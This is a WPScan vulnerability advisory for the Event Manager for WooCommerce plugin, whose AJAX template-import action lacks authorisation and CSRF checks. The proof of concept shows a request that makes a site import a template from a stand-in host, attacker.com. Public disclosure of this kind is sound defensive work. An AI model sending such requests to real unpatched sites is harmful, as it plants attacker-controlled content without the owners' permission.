WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Event Manager for WooCommerce < 3.5.3 - Unauthenticated Arbitrary Elementor Template Import

Description

The mep_import_ajax_template AJAX action of the plugin, available to both unauthenticated and authenticated users, is lacking any authorisation and CSRF checks. As a result, unauthenticated user can import arbitrary Elementor template to the blog

Proof of Concept

Legit template: https://example.com/wp-admin/admin-ajax.php?action=mep_import_ajax_template&file=https%3A%2F%2Fvaincode.com%2Fupdate%2Ftemplate%2Fjson%2Fpadma.json&editor=elm&name=Elementor+Template+-+Padma

Attacker one: https://example.com/wp-admin/admin-ajax.php?action=mep_import_ajax_template&editor=elm&name=attacker&file=https://attacker.com/template.json

Affects Plugins

mage-eventpress
Fixed in version 3.5.3

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID
85387986-5479-4575-8740-dff59866f9c6

Timeline

Publicly Published

2021-11-03 (about 10 months ago)

Added

2021-11-03 (about 10 months ago)

Last Updated

2021-11-03 (about 10 months ago)

Our Other Services

WPScan WordPress Security Plugin